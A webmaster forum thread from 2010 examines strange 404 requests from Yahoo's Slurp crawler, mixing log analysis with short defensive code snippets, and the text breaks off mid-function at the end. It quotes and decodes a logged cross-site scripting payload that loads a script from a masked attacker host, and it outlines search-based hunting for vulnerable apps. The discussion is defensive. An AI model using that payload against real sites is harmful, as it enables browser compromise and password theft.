
Yahoo Search Engine and Directory Forum

Strange 404s from Yahoo Slurp

 4:54 pm on Jun 14, 2010 (gmt 0)

For the past few months Slurp has been generating a lot of 404s. There are three types:

* Genuine 404s from pages which were deleted a while ago.
* 404s from what seems to be badly configured software.
* 404s from what seem to be attempts at exploits.

The following are 404s from Yahoo sports pages such as blogs and video sections:

404 GET /nhl/blog/YYYYY/teams/Nashville+Predators/nhl.t.27
404 GET /nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:YYYYYY:nhl,photo,YYYYYYYYYYYY_nashville_pre:1
404 GET /nhl/teams/was
404 GET /nhl/teams/cob

My sector is sports, but it has nothing to do with hockey or US sports of any kind.

If I look at the referring pages there is no link to my site, so is this badly configured software?

The following seem to be some kind of exploit:

404 /myHigherEdJobs/Login/
404 /company/contact.cfm
404 /question/index?qid=20100223114447AAUSrnf

myHigherEdJobs is, I believe, a job-site app which uses a login admin panel. As with company/contact.cfm and question/index, these pages are not on my site, and the requests look as if they are trawling for exploits.

The IP address does look genuine:



Non-authoritative answer: name = b3090812.crawl.yahoo.net.

Authoritative answers can be found from:
115.195.67.in-addr.arpa nameserver = ns2.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns3.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns4.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns5.yahoo.com.
115.195.67.in-addr.arpa nameserver = ns1.yahoo.com.
ns1.yahoo.com internet address =
ns2.yahoo.com internet address =
ns3.yahoo.com internet address =
ns4.yahoo.com internet address =
ns5.yahoo.com internet address =
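That two-step check (PTR lookup, then confirming the name resolves back to the same IP) is easy to script. A minimal sketch: the trusted suffix `.crawl.yahoo.net` comes from the nslookup output above, everything else is illustrative, and the resolver calls are injected as parameters so the matching logic can be tested offline:

```python
# Forward-confirmed reverse DNS: an IP claiming to be a crawler is
# accepted only if its PTR record ends in a trusted suffix AND that
# hostname resolves back to the original IP.
def verify_crawler(ip, trusted_suffixes, resolve_ptr, resolve_a):
    """resolve_ptr(ip) -> hostname or None; resolve_a(host) -> list of IPs."""
    host = resolve_ptr(ip)
    if host is None:
        return False
    if not any(host.endswith(suffix) for suffix in trusted_suffixes):
        return False                  # PTR name is not in a trusted domain
    return ip in resolve_a(host)      # forward lookup must confirm the IP

# In production the resolvers would be thin socket wrappers, e.g.:
#   import socket
#   resolve_ptr = lambda ip: socket.gethostbyaddr(ip)[0]
#   resolve_a   = lambda host: socket.gethostbyname_ex(host)[2]
```

A bot that merely spoofs the Slurp user-agent from an unrelated IP fails this check, which is why the matching PTR zone above is worth noting.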

So what the heck is going on here? Is this some kind of spoofing in order to crawl my site past my current bad-bot blocking, and/or exploit trawling?

As I said on another thread here, Slurp is excessively crawling the site. I am wondering if some kind of spoofing is going on and whether I should totally block the IP.



 11:48 am on Jun 19, 2010 (gmt 0)

Here's an update.

I opened a ticket with Yahoo webmaster support. I had two escalation notices and then a customer support survey request.

A bit disappointed with this. At first it seemed Yahoo support was onto something, but now silence.

Definitely something not right here. I still get the sports blog 404s (which could be Yahoo's mechanism for testing 404 responses - it says that on the webmaster support page).

The exploit trawling looks more worrying though. Could it be that someone has found a way to use SERPs as a sort of proxy to find sites with potential exploits?


 10:14 pm on Jun 19, 2010 (gmt 0)

I've been seeing yahoo bots forcing 404s as well.

I haven't got the time to waste trying to get any info/response from yahoo. I've pursued mail server problems on two occasions and each time got nowhere. The replies I DID get were pretty much standard boilerplate and my subsequent attempts to get more info/action were not replied to.

I'm used to yahoo's bad behaviour on mail and web servers (very frequent hits on bot IPs with no bot UA, for example).

Basically, if it's a Yahoo bot UA on a Yahoo bot IP (i.e. not just any old Yahoo IP) then just reject it and don't worry.


 10:35 pm on Jun 19, 2010 (gmt 0)

About a dozen, on two sites - starting on the 17th:

- - [18/Jun/2010:00:00:00 -0000] "GET /SlurpConfirm404.htm
- - [18/Jun/2010:00:00:00 -0000] "GET /SlurpConfirm404.htm


 12:44 am on Jun 20, 2010 (gmt 0)

The SlurpConfirm404 requests have only just started today. Strange, that. None before, but 8 within the past 5 hours.

I am seriously considering totally blocking the Yahoo IP range. As I said in the other thread Yahoo is the biggest single crawler / user of the site and yet it brings in a relatively small amount of traffic. The traffic:crawl ratio is minute.

I would like to know if there is some kind of exploit going on though. Why would an IP address assigned to Yahoo be trying to access pages which are possibly known exploit pages?


 7:26 pm on Jun 20, 2010 (gmt 0)

If the IP is a bot IP then it's yahoo - I doubt anyone could get an exploit onto it who wasn't yahoo. If it's not a bot IP it is possible that anyone could use it: there are a lot of yahoo proxies and access lines that anyone can use. Same with google and MS.

Some tests may be to see if a site has an open ecommerce point of some kind (or even a virus) but I think slurpconfirm404 is just that: to confirm what action a site is taking when faced with a missing page situation.

Some of my sites always redirect to the home page. Others redirect if a browser is detected (keep visitors on the site) but return a 404 if it's a bot (to please google, really). It's probably that kind of thing yahoo is trying to determine, although what they would do with the info is open to question.

I agree Yahoo is the most aggressive bot at the moment - always has been, I think. More than MS and Yandex. Far more than Google normally crawls, and at the moment almost infinitely more - Google has almost stopped crawling my sites for the past few weeks: even Yellow Pages crawls more!


 8:13 pm on Jun 21, 2010 (gmt 0)

Here's another example. This is a Yahoo Slurp IP trying to run an external JavaScript exploit against my site. Note I put example.com instead of the rogue remote site (it is a known defunct exploit .org from 2009).

- - [21/Jun/2010:20:59:44 +0100] "GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E HTTP/1.0" 500 6029 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 widgetexample.com "-" "-"

Why, how, who?


 10:47 pm on Jun 21, 2010 (gmt 0)

That is certainly a bot IP. I wonder if someone has that link on a web site somewhere and Yahoo is just following the link. The exploit, obviously, would be perpetrated from the originating web site, not from Yahoo following it - there would be no point unless Yahoo was actually trying to open you up.

If they made up the url then there is a possible case under the Computer Misuse Act (at least in the UK).

Difficult to tell where it originated, though.


 9:32 am on Jun 22, 2010 (gmt 0)

Usually these fishing-for-exploits attempts come from compromised PCs or servers. They can be dealt with.

If a bot is itself fishing for exploits then there is something seriously wrong with the bot. It has the potential to infect millions of pages.

How do I escalate this?

Yahoo webmaster customer care sent me two 'we are escalating this' messages, but you can't reply to them.

Good point on the Computer Misuse Act. I will look into this but I also think a bit of tech sites publicity will get something done.


 11:46 am on Jun 22, 2010 (gmt 0)

The following seem to be some kind of exploit:
404 /myHigherEdJobs/Login/
404 /company/contact.cfm
404 /question/index?qid=20100223114447AAUSrnf

Unless there was more code in the request than you posted, those don't have anything in them that could be exploits.

Google and Yahoo both expect sites to return 404 for nonexistent pages. Yahoo tests for it explicitly with its SlurpConfirm404 crawler by requesting pages that it knows are not on your site. If you return a 200 response or redirect to another page that returns a 200, it is considered an attempt to get more pages indexed than you actually have. Handling 404s incorrectly also has the potential of getting you hit with a duplicate content penalty, if the site sends visitors to the same landing page regardless of what nonexistent page was requested.

- - [21/Jun/2010:20:59:44 +0100] "GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E HTTP/1.0" 500 6029 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 widgetexample.com "-" "-"

Too bad you can't post what example.com was. That is strange code, but the question is whether example.com was an actually malicious site.

In view of the Google Safe Browsing malicious website database, and Yahoo's equivalent one, it wouldn't surprise me if search engines start crawling sites testing for the existence of vulnerabilities like XSS. I don't know if any are currently doing it, though.

...Others redirect if a browser is detected (keep visitors on the site) but return a 404 if it's a bot (to please google, really).

Google calls that cloaking (giving different results to search engines than to human visitors), and their quality guidelines warn against doing it.

The correct way to handle a nonexistent page is to send a 404 status code. On the 404 page, you can put links to wherever else you want, but it is important not to use any method to redirect automatically.
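As a sketch of that advice, here is a minimal WSGI-style handler (hypothetical page table, stdlib only, not any particular CMS) that returns a genuine 404 status for unknown paths, with a helpful link on the error page but no automatic redirect:

```python
# Minimal WSGI app: unknown paths get a genuine 404 status plus a
# friendly body with links -- no automatic redirect to the home page.
KNOWN_PAGES = {"/": b"<h1>Home</h1>", "/about": b"<h1>About</h1>"}

def app(environ, start_response):
    path = environ.get("PATH_INFO", "/")
    body = KNOWN_PAGES.get(path)
    if body is None:
        body = (b"<h1>Page not found</h1>"
                b'<p>Try the <a href="/">home page</a>.</p>')
        start_response("404 Not Found", [("Content-Type", "text/html")])
    else:
        start_response("200 OK", [("Content-Type", "text/html")])
    return [body]
```

A SlurpConfirm404-style probe against this app gets exactly what the crawler wants to see: a 404 status with human-friendly content, rather than a 200 or a redirect.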


 3:41 pm on Jun 22, 2010 (gmt 0)

GETs for /myHigherEdJobs/Login/

without payloads are often pre-attack attempts. Standard hack trawling to find marks ready for attacking.

the example.com mask was originally

Alpha (C)
Zero (N)
Victor (C)

I still do not understand why Yahoo would even attempt to call a script from that site, on sites which it crawls.

Either they do not know that the site did host bad scripts (Google started announcing site warnings and delisting it in Aug 09), or someone has found a way to piggyback off Yahoo SERPs in order to try and run code on target sites.


 8:21 pm on Jun 22, 2010 (gmt 0)

Steve: Let Google call it what they will, I'm giving them NO PAGE, not different content. It works fine on my sites.

Frank: I'm still thinking that yahoo is following a link from another web site IF it's a hacking type URL. If your site was once hacked then that could well be a link to your hacked site from a phishing site whose domain etc would almost certainly change at least several times a month as they got detected and canned.

The possibility that yahoo are fishing for phishes is, of course, an option but if the url is trying to PLANT an exploit that's stupid and I don't think they would! It is more likely, if it's not a phishing link but a plant attempt, that the site yahoo got it from is seeding SEs with hacking code: worrying if true, although I haven't seen anyone mention it elsewhere.


 1:15 am on Jun 23, 2010 (gmt 0)

Somewhat disorganized comments based on a longer second look...

"/question/index?qid=20100223114447AAUSrnf" is the URL format of a Yahoo Answers question, and, oddly enough, when plugged into the correct website address of YA, it is a real existing question.

Some "thinking out loud"...

"GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E"
decodes to
GET /<sc<script src=http://example.com/x.js></script>
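The decoding step itself can be reproduced with a standard percent-decoder, e.g.:

```python
from urllib.parse import unquote

# The raw request path as it appeared in the access log above.
raw = "/%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E"
decoded = unquote(raw)  # %3C -> '<', %3E -> '>', %20 -> ' '
print(decoded)
```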

example.com is, as you said, an old exploit site from last summer. That JS code was injected into server pages or databases using various injection techniques, but that code was the injected content. In itself, it's not capable of compromising the server. That was done some other way. Once the code is in the site, its job is to launch browser exploits against people who visit the site.

But the request you found in your log is misguided if it was intended as an attack on the server. The page request itself is for an HTML script tag. An attack on your *server* would have to use something like PHP (a server side language) or SQL, not JavaScript (client side).

Maybe this URL with the JS in it is an attack against you, via statistics software. If a stats program puts that text in a report of pages requested, but fails to properly sanitize HTML tags, then that script could launch the exploit against *you*, just from viewing the page containing the text, and it wouldn't matter what response code the server gave for the request. The point was to get the request into the access log, that's all.
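For what it's worth, this is exactly the failure mode that entity-encoding prevents: a stats program that escapes `<` and `>` before rendering the logged path renders the attack inert. A minimal illustration using Python's stdlib `html.escape` (the logged path is the decoded request from above):

```python
import html

# A logged request path containing a script tag, as in the access log above.
logged_path = "/<sc<script src=http://example.com/x.js></script>"

# Escaping before rendering turns the tags into harmless text entities,
# so the script can never execute in the webmaster's browser.
safe = html.escape(logged_path)
print(safe)
```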

dstiles's suggestion about what could cause a Yahoo bot to make such a request sounds like a strong possibility to me. What if somebody placed in a forum or blog comment somewhere a link to your site, but the link contains that JavaScript code as a cross-site scripting attack? It seems at least conceivable that a crawler might run across the link and innocently follow it.

Maybe try doing web searches to try to find pages with links to your site and also with references to that malicious domain.


 9:34 am on Jun 23, 2010 (gmt 0)

Yes there are 2 main issues here. Just to recap:

Badly Configured Links? / Corrupt Serps?
The first is the sports blog / Q&A crawlings, which seem badly configured. This is where pages are asked for on my site which currently exist on the Yahoo blogs / Q&A. For some reason Yahoo is asking for pages of its own blog site on my site:

- - [15/Jun/2010:22:07:21 +0100] "GET /nhl/blog/puck_daddy?author=Greg+Wyshynski HTTP/1.0" 404 5110 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; [help.yahoo.com...] 0 mysite com "-" "-"

I can not see why this should be an exploit attempt. And this is not a log-file spam attempt either, as there is only a local-side URI in the GET and not the full URL in the referrer.

Yahoo is asking for one of its own pages on my site, and this seems like some kind of corruption.

Fishing for Exploits
The second is the hits for exploit pages. These are pages which do not exist on my site, and have never existed on my site, but which a hacker will look for in order to determine if a site has the potential to be hacked because it runs a particular app.

Forget the javascript one for now. Look at the /myHigherEdJobs/Login/ crawls.

I am not certain of this but there could be an exploit with that app and that is why pages are being crawled.

Usually potential victim sites are found via SERPs. e.g. Assume that an older version of an app has a vulnerability. A hacker would attempt to find victims by searching for the app file name, or a version number, or any file in a subdirectory which could indicate the version installed. This can be done with a script to check many sites, or manually via a search engine:

search: widgetforum v2.0
search: /widgetforum/adminpanel.php
search: /widgetforum/VERSION.txt

If those are searched for then the serps will return sites which have those pages and a hacker can browse the list in order to choose marks and test the full exploits.

If a hacker wanted to test this against a site he wishes to target directly he would call for those pages on the target site.

e.g. mysite com/widgetforum/adminpanel.php

If that did not produce a 404 then he knows I have that file and will then proceed to infiltrate it.

Why does Yahoo ask for the pages?
This is the bit I can not understand. Yahoo is DIRECTLY asking for the exploit pages. It is as if the Slurp bot has been configured in some way to seek out key pages.

As I said earlier, hackers can use SEs to find potential sites but the serps will only list sites with the vulnerabilities - they have the pages on the site.

But this is not what is happening here:

- - [10/Jun/2010:07:00:12 +0100] "GET /myHigherEdJobs/Login/ HTTP/1.0" 404 5066 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; [help.yahoo.com...] 0 mysite com "-" "-"

In this instance the Yahoo crawler is hunting for the page directly, rather than a hacker's client IP finding it via SERPs.

Message Board Posting / Website Page with link to my site
Maybe there is a webpage, or a message board posting out there which has a link to this

mysite com/myHigherEdJobs/Login/

But I can't find any on yahoo or google. I have searched for mysite and the other potential exploit pages (advanced.cfm, alpha zero victor ..) and none are returned.

Besides, what is the point in a link like that being crawled? It would have no advantage for the hacker, as he would never know whether the Slurp crawl returned a 404 or not.

1. Rogue posts on message board :

'Hi .... link: mysite com/myHigherEdJobs/Login/' ... Bye

2. Any human reading that may decide to click the link and they would get a 404. The rogue hosting site would not know this.

3. Yahoo crawls the rogue post, follows the link, and receives the 404. The rogue hosting site would not know this either.

Javascript Injection
This could have been the intention of the alpha zero victor exploit. But again it is not configured correctly. If the intention is to fill log files up with links to rogue sites then surely the referring URL should be targeted, and not the GET URL.

I will let this run for a few days but soon I will have to ban the slurp IP totally. It is constantly setting off the security app alarms.


 11:17 am on Jun 23, 2010 (gmt 0)

Below is a list of all 404s triggered by Yahoo Slurp for the past month.

/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,66b88e6b63aad158b2b7cab0c51e0399-getty-97964715jd011_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,7afc820fdca02265ceb6878296b3f8d8-getty-97964715jd003_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,894633dd97ba4c3007c8b1b37dbd0dd6-getty-98143151fb011_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,a8d32f5ac24a7e6fdc1ed6d6a177f394-getty-98143151fb020_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,d0344384957b703e90969398311b0cda-getty-98143151fb005_chicago_black:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,e18a88be967bd4f20a94547feb64bcd8-getty-97964715jd004_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,eb868cb0b4c12a6bfe5da63c8884cdb0-getty-98095592jd019_nashville_pre:1
/nhl/players/2848/gallery/im:urn:newsml:sports.yahoo,getty:20050301:nhl,photo,fd1efa98f266aafcda29db0c2fde801b-getty-97964715jd012_nashville_pre:1
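A list like this can be pulled mechanically from a combined-format access log. A rough sketch (the regex assumes the common combined LogFormat shown in the log excerpts above; field positions may differ on other setups):

```python
import re

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def slurp_404s(lines):
    """Yield the request paths that Yahoo Slurp was served a 404 for."""
    for line in lines:
        m = LOG_RE.search(line)
        if m and m.group(2) == "404" and "Slurp" in m.group(3):
            yield m.group(1)
```

Feeding it a month of access-log lines gives the 404-only, Slurp-only path list directly, which makes it easy to rerun the check periodically.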


 6:03 pm on Jun 23, 2010 (gmt 0)

There is a thin line between exploit trawling and data gathering, and I suspect the latter is to blame.

By seeing if certain pages exist on your site Slurp is gathering data about what your site is made of, which obviously affects your rankings (or they wouldn't waste resources).

Some of those look like tests to see if your site throws a 404 on never-existed pages, as it should, instead of, say, a 301 or 410. Some of those look like they're testing for Slurp-only doorway pages.

It's not all bad, in fact Slurp wants to know if you have a video player, a top content section, an about page and a company page. Obviously Slurp places value on these things so jump on that free search crawler insight and create them!

Thanks for sharing the list - it looks like Slurp has figured out your site is about sports and wants to know if you feature yahoo.sports and/or Getty content... since authority sites would likely mention those two sites, perhaps you should too. On the other hand, Slurp may be looking to penalize use of those resources - hard to tell. Now I'm off to see what Google's been 404'ing on my site.


 6:34 pm on Jun 23, 2010 (gmt 0)

I don't think slurp is doing that.

Many of those URLs are hosted on Yahoo's own sites. Why would it check other sites to see if they have the same pages as Yahoo?

The /question/ ... pages are from answers.yahoo.com. Paste the second one in the list after answers.yahoo.com and you will see it is a page where someone asks for help on how to 'make out'.

Why is that page being asked for on my site?

The video player is from sports.yahoo.com. Check the first one in the list. It is a video of Detroit beating Phoenix 6-1.

Why is that page being asked for on my site?

As I say, this is not a referral coming to my site (as if the sports page had a link to my site, or someone on the answers site referenced a page on my site). This is Slurp looking for its own pages on my site, and it seems pretty dumb.

As for some of the other pages it is trying to access, well they trip alarms.

If slurp is calling for


and /login pages then this is very suspicious.

Either someone has found a way to infiltrate serps or yahoo is actively seeking pages which may have the potential to be exploitable.


Is anyone else seeing this? I don't know. I am looking for other sites reporting this problem.

Are any other crawlers doing this? No, and never. Google only 404s pages which have expired, or which were referred from mis-spelt pages.

Slurp is doing something potentially nasty here and I don't like it.


 12:29 am on Jun 24, 2010 (gmt 0)

Yahoo is asking for one of its own pages on my site, and this seems like some kind of corruption.

The only other reason I could think they might do that would be to search for scraper/mirror sites that are making illegal use of Yahoo's content via 302 redirects. However, a Google inurl: search on a couple of the partial URL strings finds them all to be only at Yahoo; no evident problem with scraper sites. Besides, their normal Slurp crawler would run across those in the normal course of events, anyway, so they'd have no need to actively search for them.

I had 2 escalation notices and then a customer support survey request...At first it seems Y support were onto something but now silence... Definitely something not right here.

Yahoo must get many questions a day about, "Why is Slurp doing [whatever]?", so it seems a bit unusual to me that you got a response at all other than something like "please read our FAQ", and even more unusual that it was escalated. Sudden silence after an initial willingness to be communicative is a fairly typical response of a big company that has found a real problem. Even if you have usefully alerted them to something they need to fix, it would be atypical for them to openly confirm it to you or solicit your further input to help them fix it. More likely, you would just eventually see the errors stop, which is possibly one reason not to block the requests for the time being.


I can think offhand of two different types of exploit trawling. One makes sense, and the other doesn't.

In order to commence a brute force password attack against a login page, you'd need to first find a login page, so it can make sense to crawl sites looking for login pages. But that would only be in preparation for a brute force attack, which will require many requests. And it's not really an exploit against an application vulnerability. [The protection against it is simply to use long random passwords.]

The other type of trawling would be to find vulnerable versions of vulnerable web applications, but I've found such trawling, without an attached payload, to be extremely rare. Given the choice between a) sending out a million requests to websites in order to find the vulnerable ones, and then following up, and b) sending out a million requests WITH the exploit payload, option b) is at least twice as efficient. It will succeed immediately against any vulnerable site, and will simply have no effect against the nonvulnerable ones. Unlike a password attack, an application exploit requires hardly any expenditure of effort. The payload is a single line of code, usually in the query string, usually referencing an outside malicious code-cache site, from where it gets a possibly complex script that carries out the full exploit. All automated, no human effort.

My logs show thousands of exploit attempts launched against web applications that I don't use. The hackers don't care if you use the app or not. Sending the payload outright instead of probe-then-exploit is a time saver.


As an additional precaution, you might check Google Webmaster Tools to ensure that Googlebot is not also under the impression that these URLs might be valid for your site. If Googlebot thinks they might be valid, that would be cause for concern.


I'm basically not convinced that there is any exploit activity going on here, except for the JavaScript attack that looks like a cross-site scripting attack of some sort.

But I am convinced that the fact these requests are coming from Yahoo is weird and possibly indicative of a Yahoo configuration problem, provided you can rule out the possibility that Yahoo might be getting these URLs from some strange source and is simply crawling them in the ordinary course of following links.

Besides, what is the point in a link like that being crawled?

Yes, exactly. Yahoo's crawling those links couldn't help any hacker.


JavaScript injection --
This could have been the intention of the alpha zero victor exploit. But again it is not configured correctly. If the intention is to fill log files up with links to rogue sites then surely the referring URL should be targeted, and not the GET URL.

Actually, the intent of that wouldn't be to fill the log with links (such as "log spamming", trying to generate backlinks to their site in website logs that the webmasters have made publicly viewable).

Rather, the intent would be to attack the webmaster's browser when the webmaster looks at his/her visitor reports. If a web page has a JavaScript script in it, then when the page loads, the JavaScript runs. The malicious GET request is a way to get their JavaScript embedded in the web page that you look at when you view your visitor reports. You open Webalizer or AWStats, or whatever, and as soon as the page loads, containing the listing of their GET request, the JavaScript runs, fetches its content from alpha zero victor, and bam! your browser is under attack. One of the pieces of the attack is a password-stealer. So if the attack succeeds at infecting your PC, they could potentially obtain your website FTP password.

But it's a low-probability attack:

a) You must have JavaScript enabled (when viewing your website logs, you probably do).
b) The JavaScript itself must be well formed, and, although I'm not an expert at XSS, I'm not sure that that JS is.
c) You must be viewing your report on a web page such as Webalizer produces.
d) That log application must *fail* to convert characters such as < and > to their HTML entities. Most major log viewers are properly configured to use HTML entities.
e) Your browser must be vulnerable to the exploit that is launched against it.
f) Your PC must be unpatched and vulnerable to the exploit that is launched against *it*.
g) You must not be running real-time antivirus software.

I get other malicious requests that appear to have a similar intent, except that instead of JS, there is PHP code embedded in the referer string, presumably in hopes that the log report page is generated using PHP and that their PHP code snippet will therefore run.


I hope others will report if they are seeing similar strange requests. I definitely have not seen any unusual requests from Yahoo.

Even if you are getting requests for /admin/ or /login/ pages, you are well protected provided that a) your application, whatever it is, is up to date and fully patched so it doesn't have known vulnerabilities, and b) you use long random passwords that would take years, decades, or millennia to crack. In other words, just because you're attacked doesn't mean you're hacked. You definitely will be attacked.


 3:37 am on Jun 24, 2010 (gmt 0)

Other than the bandwidth expended serving a 404, is there really a problem? Hitch up the undies and keep going.

Some things just don't make sense, but if they don't HURT you then ignore...


 8:31 am on Jun 24, 2010 (gmt 0)

That's a lax attitude towards security :-)

Until the reason for the page GETs is known it is a threat and needs to be treated as such.

No-one has ruled out a forged IP, no-one has ruled out a third party infiltration of serps.

It may not be hurting now but it could turn around at any time and bite in the a**.

What if I did have a higheredjobs/login/ page? What if I did have an /admin/ directory? What if they start to crawl for other pages which I do have on the site?

Even if there is no 3rd-party exploit attempt here, it is still not right. For Yahoo to be looking for the same page names as its own sites' pages seems to be a fault, and faults should be rectified.

Until I know otherwise this is a threat to my site. I am now pursuing that line of action against Yahoo and it will be up to them to explain why attempts at retrieving sensitive pages on my site are emanating from their IP.


 4:13 pm on Jun 24, 2010 (gmt 0)

I respectfully have to disagree...

sensitive pages

Anything that is considered 'sensitive' should be served only to authenticated users, and preferably over SSL. Any of your content that can be retrieved by the general public, is by definition public.

My advice would be to improve your procedures. Don't blame the bot, there is no security in obscurity...


 5:28 pm on Jun 24, 2010 (gmt 0)

Are we sure this is a bot? Even if it is a bot, why does it wish to know whether sensitive pages exist on a site or not?

My 'sensitive' pages are secured as much as I can make them. It still doesn't make it right for Yahoo (or a rogue 3rd party) to go tapping the walls to find out where the safe is.

It is sniffing around and I don't like it. It should crawl only the pages it knows about and nothing else.


 10:24 pm on Jun 24, 2010 (gmt 0)

It's a bot. I ran through my "trap" logs this evening and found nine confirm404 hits since 19th June, all from the same IP - one that has a proper crawl rDNS. The same IP actually hit 103 times in all during that period but the other hits were for genuine pages as far as I can tell (haven't checked all of them).

Because of the way my traps work the bot was effectively suspended from accessing any data after the first confirm404 hit, being fed a 403 instead. Still, slurp visits far too frequently anyway. :)


 8:20 am on Jun 25, 2010 (gmt 0)

I disallowed slurp * yesterday at 7am EST, by 3pm EST it had stopped crawling. Nothing crawled since. I think I'll keep it that way. Easier to sleep at night!
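For reference, a robots.txt rule telling Slurp to stay away entirely would look something like this (it relies on the bot honouring robots.txt, which genuine Slurp does; it does nothing against a client merely spoofing the Slurp user-agent):

```
User-agent: Slurp
Disallow: /
```

The observed lag of a few hours before crawling stops is normal, since crawlers re-fetch robots.txt only periodically.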


 3:46 pm on Jun 25, 2010 (gmt 0)

Turning off ALL of Yahoo's bots? That's one way of approaching the problem! :)


 5:34 pm on Jun 25, 2010 (gmt 0)

In a perfect world

It should crawl only the pages it knows about and nothing else.

But in reality, anything (Yahoo, probably being among the lesser evils) can and will "sniff around." Unless you are able to personally monitor and vet every single access in real time (impossible), I would suggest a more pragmatic and scalable approach. I'd also try to make it more fine-grained than "block all of Yahoo" and include multiple lines of defense.

Here are some examples:

  • Like dstiles, I have a spider trap on my homepages - but the (nofollow) linked file is also disallowed in robots.txt. Well behaved bots avoid the link. The system logs and notifies me of anything that hits the trap. I manually follow up on notifications. Sometimes a trap visit is indicative of a larger problem.

  • Generally speaking there are no files with .php, .exe, .dll, .htm or .txt extensions on my sites. Since I consider this type of probe to be a more direct form of aggression, the follow-up is more direct.

  • Certain sites are meant for specific markets. A variety of ip ranges (sometimes whole countries and backbones) do not have any legitimate use for the content. These are blocked by default.

  • Malformed user agents indicate a problem on the visitor end or worse (either a misguided enthusiast or trojaned/zombie pc). They're allowed to visit only a subset of 'known good' pages and perform specific actions.

    Implementing a ruleset that is based on whitelisted usage patterns and visitor behavior makes it quite easy to sleep at night :) Obviously, the rules are dynamic and have to be evaluated from time to time, but the result is that I can spend my time on creating content rather than chasing after every single incident...
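A trap along those lines can be sketched in a few lines. Assumptions: a hypothetical trap URL is linked (nofollow) from the homepage and disallowed in robots.txt, so any client that requests it has ignored the rules and gets suspended:

```python
# Spider trap: any client that requests the disallowed trap URL is
# added to a blocklist; subsequent requests from that IP get a 403.
TRAP_PATH = "/trap/do-not-crawl.html"   # hypothetical; also listed in robots.txt
blocked_ips = set()

def handle_request(ip, path):
    """Return the HTTP status code to serve for this request."""
    if ip in blocked_ips:
        return 403                      # previously trapped: access suspended
    if path == TRAP_PATH:
        blocked_ips.add(ip)             # ignored robots.txt: trap sprung
        return 403
    return 200                          # normal request: serve as usual
```

In a real deployment the blocklist would be persisted and the trap hit would trigger a notification, matching the manual follow-up described above.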

  • Frank_Rizzo

     6:23 pm on Jun 25, 2010 (gmt 0)

    I don't know what you are trying to state there caribguy. I don't know if what you are saying answers my questions and concerns?

    1. Is it now Yahoo policy to deliberately and proactively sniff for admin and login pages?
    2. Has the IP listed above been spoofed?
    3. Has someone worked out how to manipulate SERPs in order to find admin and login pages?

    That's what I am trying to find out here.

    Yahoo is not responding to my emails, and the fact that I can only find two or three sites with similar concerns over the past two years is very worrying indeed.

    Until I get answers Yahoo is going to remain blocked. My loss more than theirs, I know. But I take a zero tolerance approach to anything which goes sniffing for admin pages.


     7:28 pm on Jun 25, 2010 (gmt 0)

    I was suggesting an alternate approach: a more proactive security stance that lets you worry less about the sources of probes and other incidents, of which there are many, and instead focus on a structured way to deal with 'bad behavior' in general (based on what you deem appropriate).

    Naturally, I could be wrong :) In that case I'd be interested to hear what, if anything the Yahooligans have to say...


     8:11 pm on Jun 25, 2010 (gmt 0)

    Frank, I think you should read back several months' worth of the SE forum on this site if you haven't already done so. There is a LOT of info embedded in there, either explicitly or implicitly, on how and what to block.

    Yahoo is VERY much a minor irritation compared with some of the very real attacks, scrapes, spams and general scum hits that are around. As caribguy said, concentrating on killing yahoo is missing the point: concentrate on killing scum and yahoo will drop into the trap IF they misbehave, even if their intentions are "honourable". That is precisely what happens on my multi-site server.

    The worst attack I've sustained on my server so far this year came from a bank/creditcard-sponsored "security" service. It dragged my server down almost completely for about 45 minutes one night, without my permission: the "page urls" it tried were along the lines of the Yahoo ones but far more extensive (and yet ultimately stupid and useless as security checks). The server stood up to it because the ("home-made") infrastructure was designed to block such attacks.

    Fix the underpinnings and let yahoo wander at will - until it hits the traps and blocks itself.


     2:20 am on Jun 26, 2010 (gmt 0)

    Some comments... some of it might be useful or interesting:

    No-one has ruled out a forged IP

    If someone sends a request with a forged source IP address, they won't get a reply from the server, because the reply goes to the address they supplied - the forged one. (With HTTP over TCP, the connection handshake can't even complete, so a forged request typically never reaches the web application at all.) A forged-IP attack against your site would therefore *have* to carry its attack payload blind - it's no use at all for site probing - because the sender knows they'll get nothing back from an HTTP request that gives a forged return address. The attack scenario doesn't seem likely here anyway, because none of the URLs you listed, except the somewhat lame-looking XSS one, were any type of attack at all.
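    This is also why the standard check for crawler identity is the double lookup: reverse-resolve the requesting IP, confirm the hostname is under crawl.yahoo.net (as in the nslookup output above), then forward-resolve that hostname and confirm it maps back to the same IP. A sketch using Python's standard socket module - the resolver arguments are parameters only so the logic can be exercised without live DNS; the IP below is illustrative:

```python
import socket

def is_yahoo_crawler(ip, reverse=socket.gethostbyaddr,
                     forward=socket.gethostbyname_ex):
    """Double DNS lookup: reverse-resolve the IP, require a hostname
    under crawl.yahoo.net, then forward-resolve that hostname and
    require it to map back to the same IP."""
    try:
        host = reverse(ip)[0]              # e.g. b3090812.crawl.yahoo.net
        if not host.endswith(".crawl.yahoo.net"):
            return False
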